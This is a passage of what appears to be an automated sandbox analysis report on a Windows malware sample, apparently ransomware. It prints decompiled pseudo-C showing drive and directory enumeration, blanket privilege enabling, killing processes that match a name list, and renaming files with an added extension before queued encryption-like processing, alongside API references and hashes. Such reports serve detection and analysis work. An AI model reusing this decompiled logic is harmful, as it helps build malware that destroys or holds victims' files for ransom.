						 *((short*)(_t49 + _t35 * 2)) = 0x5c;
						_t49 =  &(_t49[0]);
					}
					 *((intOrPtr*)(_t49 + _t35 * 2)) = 0x2d0053;
					 *((intOrPtr*)(_t49 + 4 + _t35 * 2)) = 0x2a;
					_t30 = FindFirstFileExW( &_v1120, 0,  &_v600, 0, 0, 2); // executed
					_v8 = _t30;
					if(_v8 != 0xffffffff) {
						do {
							if((_v600.dwFileAttributes & 0x00000010) != 0) {
								_t50 =  &_v1640;
								wcscpy(_t50,  &_v1120);
								wcscpy( &((wcsrchr(_t50, 0x5c))[0]),  &(_v600.cFileName));
								_t53 = _t53 + 0x18;
								E00CE5490(_t50); // executed
							}
							_t40 = FindNextFileW(_v8,  &_v600); // executed
						} while (_t40 != 0);
						_t41 = FindClose(_v8); // executed
						return _t41;
					}
				}
				return _t30;
			}

0x00ce5273
0x00ce527a
0x00ce528c
0x00ce5291
0x00ce529f
0x00ce52a9
0x00ce52af
0x00ce52b8
0x00ce52ba
0x00ce52c0
0x00ce52c0
0x00ce52c3
0x00ce52ca
0x00ce52e8
0x00ce52ee
0x00ce52f5
0x00ce52f7
0x00ce5301
0x00ce5309
0x00ce5317
0x00ce5331
0x00ce5337
0x00ce533b
0x00ce533b
0x00ce534a
0x00ce5350
0x00ce5357
0x00000000
0x00ce5357
0x00ce52f5
0x00ce5365

APIs

Part of subcall function 00CE5368: wcscpy.NTDLL ref: 00CE5398
Part of subcall function 00CE5368: wcslen.NTDLL ref: 00CE53A2
Part of subcall function 00CE5368: FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000002,?,?,00000000), ref: 00CE53FF
Part of subcall function 00CE5368: wcscpy.NTDLL ref: 00CE5427
Part of subcall function 00CE5368: wcslen.NTDLL ref: 00CE5431
Part of subcall function 00CE5368: wcscpy.NTDLL ref: 00CE5453
Part of subcall function 00CE5368: FindClose.KERNEL32(000000FF,?,?,00000000), ref: 00CE547C

wcscpy.NTDLL ref: 00CE529F
wcslen.NTDLL ref: 00CE52A9
FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000002,?,?,00000000), ref: 00CE52E8
wcscpy.NTDLL ref: 00CE5317
wcsrchr.NTDLL ref: 00CE5323
wcscpy.NTDLL ref: 00CE5331
FindNextFileW.KERNEL32(000000FF,?,?,?,00000000), ref: 00CE534A
FindClose.KERNEL32(000000FF,?,?,00000000), ref: 00CE5357

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$Find$Filewcslen$CloseFirst$Nextwcsrchr
String ID:
API String ID: 1464523638-0
Opcode ID: 775c3456160435db58c9bf5b034f3d2e1fd0d9e796447c60ef8ca92746ab9062
Instruction ID: f39775637ec4353b33bf27852761a9f64ca7f4ad621f02f173621ba9b66de358
Opcode Fuzzy Hash: 775c3456160435db58c9bf5b034f3d2e1fd0d9e796447c60ef8ca92746ab9062
Instruction Fuzzy Hash: E721A571900619AFDB209B94DD4AFFEB77CEF50706F100150E904A2061EB716F69CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4B67, Relevance: 10.6, APIs: 7, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CE4B67() {
				void* _v8;
				void _v12;
				long _v16;
				char _t23;
				char _t30;
				void _t31;

				_v8 = 0;
				_v12 = 0;
				_t23 = OpenProcessToken(0xffffffff, 0x28,  &_v8);
				if(_t23 != 0) {
					GetTokenInformation(_v8, 3,  &_v12, 4,  &_v16); // executed
					_v12 = RtlAllocateHeap( *0xcf0a9e, 8, _v16);
					_t23 = GetTokenInformation(_v8, 3, _v12, _v16,  &_v16); // executed
					if(_t23 != 0) {
						_t31 = _v12;
						asm("lodsd");
						_t30 = _t23;
						do {
							if( *((intOrPtr*)(_t31 + 8)) == 0) {
								 *((intOrPtr*)(_t31 + 8)) = 2;
							}
							_t31 = _t31 + 0xc;
							_t30 = _t30 - 1;
						} while (_t30 != 0);
						_t23 = AdjustTokenPrivileges(_v8, 0, _v12, 0, 0, 0); // executed
					}
				}
				if(_v12 != 0) {
					_t23 = RtlFreeHeap( *0xcf0a9e, 0, _v12);
				}
				if(_v8 != 0) {
					return CloseHandle(_v8);
				}
				return _t23;
			}

0x00ce4b72
0x00ce4b79
0x00ce4b88
0x00ce4b90
0x00ce4ba1
0x00ce4bb8
0x00ce4bca
0x00ce4bd2
0x00ce4bd4
0x00ce4bd7
0x00ce4bd8
0x00ce4bda
0x00ce4bde
0x00ce4be0
0x00ce4be0
0x00ce4be7
0x00ce4bea
0x00ce4beb
0x00ce4bfd
0x00ce4bfd
0x00ce4bd2
0x00ce4c07
0x00ce4c14
0x00ce4c14
0x00ce4c1e
0x00000000
0x00ce4c23
0x00ce4c31

APIs

OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 00CE4B88
GetTokenInformation.KERNELBASE(00000000,00000003(TokenIntegrityLevel),00000000,00000004,00CED4CD), ref: 00CE4BA1
RtlAllocateHeap.NTDLL(00000008,00CED4CD), ref: 00CE4BB2
GetTokenInformation.KERNELBASE(00000000,00000003(TokenIntegrityLevel),00000000,00CED4CD,00CED4CD), ref: 00CE4BCA
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CE4BFD
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4C14
CloseHandle.KERNEL32(00000000), ref: 00CE4C23

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$HeapInformation$AdjustAllocateCloseFreeHandleOpenPrivilegesProcess
String ID:
API String ID: 1534737286-0
Opcode ID: b0b02108a83785cb2843c9394d1eaad070c12c4210fa7b469ca696d562e0b585
Instruction ID: e39e18aa60e7a8cf188bd47d3796f3f023dd24a45ac9b2efb297edb993526871
Opcode Fuzzy Hash: b0b02108a83785cb2843c9394d1eaad070c12c4210fa7b469ca696d562e0b585
Instruction Fuzzy Hash: F4213776A00608FFEB119F81DC49BAEBBB9EB04B12F2041A4E611A20E1D7B25B54DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4E18, Relevance: 10.6, APIs: 7, Instructions: 53
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CE4E18() {
				long _t23;
				void* _t25;
				wchar_t* _t27;
				signed int _t28;
				void* _t34;
				wchar_t* _t41;
				void _t44;
				void* _t46;
				void* _t49;
				void* _t51;

				while(1) {
					_t23 = NtQuerySystemInformation(5,  *(_t46 - 0xc),  *(_t46 - 8), _t46 - 8); // executed
					if(_t23 == 0) {
						break;
					}
					if(_t23 != 0xc0000004) {
						return RtlFreeHeap( *0xcf0a9e, 0,  *(_t46 - 0xc));
					} else {
						_t25 = RtlReAllocateHeap( *0xcf0a9e, 0,  *(_t46 - 0xc),  *(_t46 - 8)); // executed
						 *(_t46 - 0xc) = _t25;
						continue;
					}
					L18:
				}
				_t34 =  *(_t46 - 0xc);
				do {
					_t44 =  *_t34;
					if( *(_t34 + 0x3c) != 0) {
						 *0xcf0cf6( *(_t34 + 0x3c));
						_t51 = _t49 + 4;
						_t41 =  *0xcf0910; // 0x7e9f00
						while(1) {
							_t27 = wcsstr( *(_t34 + 0x3c), _t41);
							_t49 = _t51 + 8;
							if(_t27 == 0) {
								goto L13;
							}
							L11:
							 *(_t46 - 4) = OpenProcess(1, 0,  *(_t34 + 0x44));
							if( *(_t46 - 4) == 0) {
								goto L13;
							} else {
								TerminateProcess( *(_t46 - 4), 0);
								CloseHandle( *(_t46 - 4));
							}
							goto L16;
							L13:
							_t28 = wcslen(_t41);
							_t51 = _t49 + 4;
							_t41 = _t41 + 2 + _t28 * 2;
							if( *_t41 != 0) {
								_t27 = wcsstr( *(_t34 + 0x3c), _t41);
								_t49 = _t51 + 8;
								if(_t27 == 0) {
									goto L13;
								}
							} else {
							}
							goto L16;
						}
					}
					L16:
					_t34 = _t34 + _t44;
				} while (_t44 != 0);
				return RtlFreeHeap( *0xcf0a9e, 0,  *(_t46 - 0xc));
				goto L18;
			}

0x00ce4e00
0x00ce4e0c
0x00ce4e14
0x00000000
0x00000000
0x00ce4e1f
0x00ce4e55
0x00ce4e21
0x00ce4e2f
0x00ce4e35
0x00000000
0x00ce4e35
0x00000000
0x00ce4e1f
0x00ce4e58
0x00ce4e5b
0x00ce4e5b
0x00ce4e61
0x00ce4e66
0x00ce4e6c
0x00ce4e6f
0x00ce4e75
0x00ce4e79
0x00ce4e7f
0x00ce4e84
0x00000000
0x00000000
0x00ce4e86
0x00ce4e93
0x00ce4e9a
0x00000000
0x00ce4e9c
0x00ce4ea1
0x00ce4eaa
0x00ce4eaa
0x00000000
0x00ce4eb2
0x00ce4eb3
0x00ce4eb9
0x00ce4ebc
0x00ce4ec4
0x00ce4e79
0x00ce4e7f
0x00ce4e84
0x00000000
0x00000000
0x00000000
0x00ce4ec6
0x00000000
0x00ce4ec4
0x00ce4e75
0x00ce4eca
0x00ce4eca
0x00ce4ecd
0x00ce4eea
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 00CE4E0C
RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 00CE4E2F
_wcslwr.NTDLL ref: 00CE4E66
wcsstr.NTDLL ref: 00CE4E79
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CE4E8D
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CE4EA1
CloseHandle.KERNEL32(00000000), ref: 00CE4EAA
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE4EDC

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleInformationOpenQuerySystemTerminate_wcslwrwcsstr
String ID:
API String ID: 2359769181-0
Opcode ID: 5931bb965d555089f5daabf2bde461e6898db6c1651911d5fa6dfef49e91316e
Instruction ID: d89a7680dc2d689bdc0701b01218c2a87a278f9ad590aa65ddcfa06054a2df47
Opcode Fuzzy Hash: 5931bb965d555089f5daabf2bde461e6898db6c1651911d5fa6dfef49e91316e
Instruction Fuzzy Hash: 24115E32A00144EFDF298F92EC48BAEBB35FF04B01F204091EA11661A2D7726E50DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4E3A, Relevance: 10.6, APIs: 7, Instructions: 53
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CE4E3A() {
				long _t23;
				void* _t25;
				wchar_t* _t27;
				signed int _t28;
				void* _t34;
				wchar_t* _t41;
				void _t44;
				void* _t46;
				void* _t49;
				void* _t51;

				while(1) {
					_t23 = NtQuerySystemInformation(5,  *(_t46 - 0xc),  *(_t46 - 8), _t46 - 8); // executed
					if(_t23 == 0) {
						break;
					}
					if(_t23 != 0xc0000004) {
						return RtlFreeHeap( *0xcf0a9e, 0,  *(_t46 - 0xc));
					} else {
						_t25 = RtlReAllocateHeap( *0xcf0a9e, 0,  *(_t46 - 0xc),  *(_t46 - 8)); // executed
						 *(_t46 - 0xc) = _t25;
						continue;
					}
					L18:
				}
				_t34 =  *(_t46 - 0xc);
				do {
					_t44 =  *_t34;
					if( *(_t34 + 0x3c) != 0) {
						 *0xcf0cf6( *(_t34 + 0x3c));
						_t51 = _t49 + 4;
						_t41 =  *0xcf0910; // 0x7e9f00
						while(1) {
							_t27 = wcsstr( *(_t34 + 0x3c), _t41);
							_t49 = _t51 + 8;
							if(_t27 == 0) {
								goto L13;
							}
							L11:
							 *(_t46 - 4) = OpenProcess(1, 0,  *(_t34 + 0x44));
							if( *(_t46 - 4) == 0) {
								goto L13;
							} else {
								TerminateProcess( *(_t46 - 4), 0);
								CloseHandle( *(_t46 - 4));
							}
							goto L16;
							L13:
							_t28 = wcslen(_t41);
							_t51 = _t49 + 4;
							_t41 = _t41 + 2 + _t28 * 2;
							if( *_t41 != 0) {
								_t27 = wcsstr( *(_t34 + 0x3c), _t41);
								_t49 = _t51 + 8;
								if(_t27 == 0) {
									goto L13;
								}
							} else {
							}
							goto L16;
						}
					}
					L16:
					_t34 = _t34 + _t44;
				} while (_t44 != 0);
				return RtlFreeHeap( *0xcf0a9e, 0,  *(_t46 - 0xc));
				goto L18;
			}

APIs

NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 00CE4E0C
RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 00CE4E2F
_wcslwr.NTDLL ref: 00CE4E66
wcsstr.NTDLL ref: 00CE4E79
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CE4E8D
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CE4EA1
CloseHandle.KERNEL32(00000000), ref: 00CE4EAA
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE4EDC

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleInformationOpenQuerySystemTerminate_wcslwrwcsstr
String ID:
API String ID: 2359769181-0
Opcode ID: 6f2d95bafbca908860db7c6d7b6328650923cd6343a747dac7cba50f4156c58a
Instruction ID: d89a7680dc2d689bdc0701b01218c2a87a278f9ad590aa65ddcfa06054a2df47
Opcode Fuzzy Hash: 6f2d95bafbca908860db7c6d7b6328650923cd6343a747dac7cba50f4156c58a
Instruction Fuzzy Hash: 24115E32A00144EFDF298F92EC48BAEBB35FF04B01F204091EA11661A2D7726E50DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CE51E6, Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE51E6() {
				char _v36;
				short _v292;
				int _t7;
				unsigned int _t10;
				unsigned int _t11;
				wchar_t* _t12;
				wchar_t* _t13;
				void* _t14;

				_t7 = GetLogicalDriveStringsW(0x80,  &_v292); // executed
				_t10 = _t7;
				if(_t10 != 0) {
					_t13 =  &_v292;
					_t11 = _t10 >> 2;
					do {
						_t7 = GetDriveTypeW(_t13);
						if(_t7 == 3 || _t7 == 2) {
							_t12 =  &_v36;
							 *_t12 = 0x5c005c;
							 *((intOrPtr*)(_t12 + 4)) = 0x5c003f;
							wcscpy(_t12 + 8, _t13);
							_t14 = _t14 + 8;
							_t7 = E00CE525B(_t12); // executed
						}
						_t13 =  &(_t13[2]);
						_t11 = _t11 - 1;
					} while (_t11 != 0);
				}
				return _t7;
			}

0x00ce5200
0x00ce5206
0x00ce520a
0x00ce520c
0x00ce5212
0x00ce5215
0x00ce5216
0x00ce521f
0x00ce5226
0x00ce5229
0x00ce522f
0x00ce523b
0x00ce5241
0x00ce5245
0x00ce5245
0x00ce524a
0x00ce524d
0x00ce524e
0x00ce5215
0x00ce525a

APIs

GetLogicalDriveStringsW.KERNEL32(00000080,?,?,?,?,?,00000000), ref: 00CE5200
GetDriveTypeW.KERNEL32(?,?,?,?,?,00000000), ref: 00CE5216
wcscpy.NTDLL ref: 00CE523B

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Drive$LogicalStringsTypewcscpy
String ID:
API String ID: 2407912034-0
Opcode ID: e56e7f5a336d453404d7f423cd974dbd7725a65edd94aae8b6acba1dfe4fbc33
Instruction ID: f79f3a777157ba229892ddd228be878934b6095b45a6851175063e8e2568c50f
Opcode Fuzzy Hash: e56e7f5a336d453404d7f423cd974dbd7725a65edd94aae8b6acba1dfe4fbc33
Instruction Fuzzy Hash: 25F02877501619ABD7209BC5AC89FFB77ACFB89304F100225EE04A2101DB206D15CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4C32, Relevance: 3.0, APIs: 2, Instructions: 28
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE4C32(void _a4) {
				long _t4;

				 *0xcf1020 = _a4;
				 *0xcf1020 =  *0xcf1020 << 8;
				NtSetInformationProcess(0xffffffff, 0x12, 0xcf1020, 2); // executed
				 *0xcf1020 =  *0xcf1020 >> 8;
				_t4 = NtSetInformationProcess(0xffffffff, 0x21, 0xcf1020, 4); // executed
				return _t4;
			}

0x00ce4c3d
0x00ce4c42
0x00ce4c54
0x00ce4c5a
0x00ce4c6c
0x00ce4c78

APIs

NtSetInformationProcess.NTDLL(000000FF,00000012,00CF1020,00000002), ref: 00CE4C54
NtSetInformationProcess.NTDLL(000000FF,00000021,00CF1020,00000004), ref: 00CE4C6C

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationProcess
String ID:
API String ID: 1801817001-0
Opcode ID: 0d4bd80e82de47dadfc1d512060472168b3ab338ee523821f77bdb3f729b6f6e
Instruction ID: cb622f69a9e516128efed3e70ee7e10014a97673d66e13ca00e69ccbdcffad3b
Opcode Fuzzy Hash: 0d4bd80e82de47dadfc1d512060472168b3ab338ee523821f77bdb3f729b6f6e
Instruction Fuzzy Hash: 29E09272284384BBE1104749AC0AF7E7758E398FB1F244326FB20550D5CBA22890C57E

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6245, Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 365
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CE6245(wchar_t* _a4, intOrPtr _a8, long _a12, wchar_t* _a16) {
				long _v8;
				void* _v12;
				void* _v16;
				WCHAR* _v20;
				char _v148;
				signed int _t95;
				void* _t98;
				void* _t99;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t127;
				void* _t151;
				long _t170;
				wchar_t* _t173;
				long _t174;
				wchar_t* _t175;
				void* _t176;

				_v8 = 0;
				if(_a12 != 0 || _a8 != 0) {
					_v16 = 0;
					_v20 = 0;
					_v16 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000);
					if(_v16 == 0) {
						L75:
						if(_v16 != 0) {
							RtlFreeHeap( *0xcf0a9e, 0, _v16);
						}
						if(_v20 != 0) {
							RtlFreeHeap( *0xcf0a9e, 0, _v20); // executed
						}
						goto L79;
					} else {
						_t173 = _v16;
						wcscpy(_t173, _a16);
						_t95 = wcslen(_t173);
						if( *((short*)(_t173 + _t95 * 2 - 2)) == 0x5c) {
							wcscpy(_t173 + _t95 * 2, _a4);
						} else {
							 *(_t173 + _t95 * 2) = 0x5c;
							_t17 = _t95 * 2; // 0x2
							wcscpy(_t173 + _t17 + 2, _a4);
						}
						_t98 = E00CE611A(_t173); // executed
						if(_t98 != 0) {
							goto L75;
						}
						_t99 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000); // executed
						_v20 = _t99;
						if(_v20 == 0) {
							goto L75;
						} else {
							_t175 = _v20;
							wcscpy(_t175, _t173);
							wcscpy(_t175 + wcslen(_t175) * 2, ".418990b0");
							while(1) {
								_t104 = MoveFileExW(_v16, _v20, 8); // executed
								if(_t104 != 0) {
									break;
								}
								if( *0xcf07e1 == 0 ||  *[fs:0x34] != 0x20 || E00CE57E5(_v16) == 0) {
									goto L75;
								} else {
									continue;
								}
							}
							_t105 = CreateFileW(_v20, 0xc0000000, 0, 0, 3, 0x48000000, 0); // executed
							_v12 = _t105;
							if(_v12 == 0xffffffff) {
								goto L75;
							}
							if( *0xcf1448 == 0) {
								_t106 = CreateIoCompletionPort(_v12,  *0xcf1028, 0, 0); // executed
								if(_t106 != 0) {
									L22:
									_t107 = RtlAllocateHeap( *0xcf0a9e, 0, 0x80104); // executed
									_t151 = _t107;
									if(_t151 != 0) {
										E00CE13DA(_t107, _t151, 0x80104);
										if( *0xcf07e0 != 1) {
											if( *0xcf07e0 != 2) {
												 *(_t151 + 0x28) = 1;
												 *(_t151 + 0x24) = 1;
												_t170 = _a12;
												_t110 =  *0xcf0d0e();
												if(_t170 != 0 || _t110 != 0) {
													_t176 = _t110;
													_t174 = _t170;
													if(_t176 > 0x3e8) {
														if(_t176 > 0xfa0) {
															if(_t176 > 0x1f40) {
																if(_t176 > 0x3e80) {
																	if(_t176 > 0x7d00) {
																		if(_t176 > 0xfa00) {
																			if(_t176 > 0x1f400) {
																				if(_t176 > 0x3e800) {
																					if(_t176 > 0x7d000) {
																						if(_t176 > 0xfa000) {
																							if(_t176 > 0x1f4000) {
																								if(_t176 > 0x3e8000) {
																									if(_t176 > 0x7d0000) {
																										if(_t176 > 0xfa0000) {
																											if(_t176 > 0x1f40000) {
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													_t111 =  *0xcf0d0e();
													if(_t170 != 0 || _t111 != 0) {
														_t112 =  *0xcf0d12(_t176, _t174, _t111, _t170);
														_t111 =  *0xcf0d16(_t112, _t170, 0x200000, 0);
													}
													goto L64;
												} else {
													L64:
													asm("adc edx, 0x0");
													 *(_t151 + 0x1c) = _t111 + 0x80000;
													 *(_t151 + 0x20) = _t170;
													goto L65;
												}
											} else {
												 *(_t151 + 0x28) = 1;
												 *(_t151 + 0x24) = 1;
												 *(_t151 + 0x1c) = 0xffffffff;
												 *(_t151 + 0x20) = 0xffffffff;
												goto L65;
											}
										} else {
											 *(_t151 + 0x28) = 1;
											 *(_t151 + 0x24) = 1;
											 *(_t151 + 0x1c) = 0x80000;
											 *(_t151 + 0x20) = 0;
											L65:
											 *(_t151 + 0xbc) =  *(_t151 + 0x1c);
											 *(_t151 + 0xc0) =  *(_t151 + 0x20);
											 *((intOrPtr*)(_t151 + 0x2c)) = _v12;
											 *((intOrPtr*)(_t151 + 0xb4)) = _a8;
											 *(_t151 + 0xb8) = _a12;
											_t62 = _t151 + 0x34; // 0x34
											E00CE2068(_t62);
											_t63 = _t151 + 0x34; // 0x34
											_t64 = _t151 + 0x74; // 0x74
											E00CE1472(_t64, _t64, _t63, 0x40);
											_t66 = _t151 + 0x74; // 0x74
											E00CE272F(_t66, 0xcf07f8, 0xcf0878);
											_t67 = _t151 + 0x74; // 0x74
											_t127 = E00CE1E10(_t67, 0x80, 0);
											_t68 = _t151 + 0xf4; // 0xf4
											E00CE1472(_t68, _t68, _t127, 0x10);
											 *(_t151 + 0x30) = 0;
											if( *0xcf092c != 0) {
												 *0xcf0cfa( &_v148, 0xceb4cc,  *((intOrPtr*)(_t151 + 0x2c)));
												E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4ac,  &_v148, _v16);
											}
											if( *0xcf1448 == 0) {
												if(PostQueuedCompletionStatus( *0xcf1028, 0, 0, _t151) != 0) {
													InterlockedIncrement(0xcf1040);
													 *0xcf1448 = 1;
													_v8 = 1;
												} else {
													RtlFreeHeap( *0xcf0a9e, 0, _t151);
													CloseHandle(_v12);
												}
											} else {
												if(PostQueuedCompletionStatus( *0xcf1024, 0, 0, _t151) != 0) {
													InterlockedIncrement(0xcf1038);
													 *0xcf1448 = 0;
													_v8 = 1;
												} else {
													RtlFreeHeap( *0xcf0a9e, 0, _t151);
													CloseHandle(_v12);
												}
											}
											goto L75;
										}
									} else {
										CloseHandle(_v12);
										goto L75;
									}
								} else {
									CloseHandle(_v12);
									goto L75;
								}
							}
							if(CreateIoCompletionPort(_v12,  *0xcf1024, 0, 0) != 0) {
								goto L22;
							} else {
								CloseHandle(_v12);
								goto L75;
							}
						}
					}
				} else {
					L79:
					if( *0xcf07f7 != 0) {
						if(_v8 == 0) {
							InterlockedIncrement(0xcf0aae);
						} else {
							 *0xcf0ab6 =  *0xcf0ab6 + _a8;
							asm("adc [0xcf0aba], eax");
							InterlockedIncrement(0xcf0aaa);
						}
					}
					return _v8;
				}
			}

0x00ce6253
0x00ce625e
0x00ce626a
0x00ce6271
0x00ce628b
0x00ce6292
0x00ce6738
0x00ce673c
0x00ce6749
0x00ce6749
0x00ce6753
0x00ce6760
0x00ce6760
0x00000000
0x00ce6298
0x00ce6298
0x00ce629f
0x00ce62a9
0x00ce62b8
0x00ce62da
0x00ce62ba
0x00ce62ba
0x00ce62c3
0x00ce62c8
0x00ce62ce
0x00ce62e4
0x00ce62eb
0x00000000
0x00000000
0x00ce62fe
0x00ce6304
0x00ce630b
0x00000000
0x00ce6311
0x00ce6311
0x00ce6316
0x00ce6332
0x00ce633b
0x00ce6343
0x00ce634b
0x00000000
0x00000000
0x00ce6354
0x00000000
0x00ce636c
0x00000000
0x00ce636c
0x00ce6354
0x00ce6388
0x00ce638e
0x00ce6395
0x00000000
0x00000000
0x00ce63a2
0x00ce63d8
0x00ce63e0
0x00ce63f0
0x00ce63fd
0x00ce6403
0x00ce6407
0x00ce641d
0x00ce6429
0x00ce6453
0x00ce6476
0x00ce647d
0x00ce6487
0x00ce648f
0x00ce6497
0x00ce64a1
0x00ce64a3
0x00ce64ab
0x00ce64bd
0x00ce64cf
0x00ce64e1
0x00ce64f3
0x00ce6505
0x00ce6517
0x00ce6526
0x00ce6535
0x00ce6544
0x00ce6553
0x00ce6562
0x00ce6571
0x00ce6580
0x00ce658f
0x00ce658f
0x00ce658f
0x00ce6580
0x00ce6571
0x00ce6562
0x00ce6553
0x00ce6544
0x00ce6535
0x00ce6526
0x00ce6517
0x00ce6505
0x00ce64f3
0x00ce64e1
0x00ce64cf
0x00ce64bd
0x00ce659d
0x00ce65a5
0x00ce65af
0x00ce65be
0x00ce65be
0x00000000
0x00ce65c4
0x00ce65c4
0x00ce65c9
0x00ce65cc
0x00ce65cf
0x00000000
0x00ce65cf
0x00ce6455
0x00ce6455
0x00ce645c
0x00ce6463
0x00ce646a
0x00000000
0x00ce646a
0x00ce642b
0x00ce642b
0x00ce6432
0x00ce6439
0x00ce6440
0x00ce65d2
0x00ce65d8
0x00ce65de
0x00ce65e7
0x00ce65f0
0x00ce65f6
0x00ce65fc
0x00ce6600
0x00ce6607
0x00ce660b
0x00ce660f
0x00ce6624
0x00ce6628
0x00ce6634
0x00ce6638
0x00ce6640
0x00ce6647
0x00ce664c
0x00ce665a
0x00ce666b
0x00ce668e
0x00ce668e
0x00ce669a
0x00ce6700
0x00ce6721
0x00ce6727
0x00ce6731
0x00ce6702
0x00ce670b
0x00ce6714
0x00ce6714
